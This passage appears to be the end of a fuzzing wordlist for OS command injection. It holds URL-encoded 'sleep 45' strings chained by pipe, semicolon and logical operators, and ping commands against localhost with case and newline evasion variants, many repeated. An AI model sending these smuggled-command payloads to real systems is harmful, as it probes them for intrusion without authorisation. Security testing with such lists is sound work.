    "sleep%20%34%35%20%7C%20echo%20complete",
    "sleep%20%34%35%20%26%26%20echo%20done",
    "sleep%20%34%35%20%7C%7C%20echo%20done",
    "sleep%20%34%35%20%3B%20echo%20done",
    "sleep%20%34%35%20%7C%20echo%20done",
    "sleep%20%34%35%20%26%26%20echo%20finished",
    "sleep%20%34%35%20%7C%7C%20echo%20finished",
    "sleep%20%34%35%20%3B%20echo%20finished",
    "sleep%20%34%35%20%7C%20echo%20finished",
    "sleep%20%34%35%20%26%26%20echo%20complete",
    "sleep%20%34%35%20%7C%7C%20echo%20complete",
    "sleep%20%34%35%20%3B%20echo%20complete",
    "sleep%20%34%35%20%7C%20echo%20complete",
    "sleep%20%34%35%20%26%26%20echo%20done",
    "sleep%20%34%35%20%7C%7C%20echo%20done",
    "sleep%20%34%35%20%3B%20echo%20done",
    "sleep%20%34%35%20%7C%20echo%20done",
    "sleep%20%34%35%20%26%26%20echo%20finished",
    "sleep%20%34%35%20%7C%7C%20echo%20finished",
    "sleep%20%34%35%20%3B%20echo%20finished",
    "sleep%20%34%35%20%7C%20echo%20finished",
    "sleep%20%34%35%20%26%26%20echo%20complete",
    "sleep%20%34%35%20%7C%7C%20echo%20complete",
    "sleep%20%34%35%20%3B%20echo%20complete",
    "sleep%20%34%35%20%7C%20echo%20complete",
    "ping -c 4 -i 10 127.0.0.1",
    "ping -c 4 -i 10 localhost",
    "ping -c 4 -i 10 ::1",
    "pIng -c 4 -i 10 127.0.0.1",
    "pi\ng -c 4 -i 10 127.0.0.1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20::1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "pi\ng%20-c%204%20-i%2010%20127.0.0.1",
    "pi\ng%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20localhost",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "ping%20-c%204%20-i%2010%20%3A%3A1",
    "ping%20-c%204%20-i%2010%20127.0.0.1",
    "pi\ng%20-c%204%20-i%2010%20localhost",

]
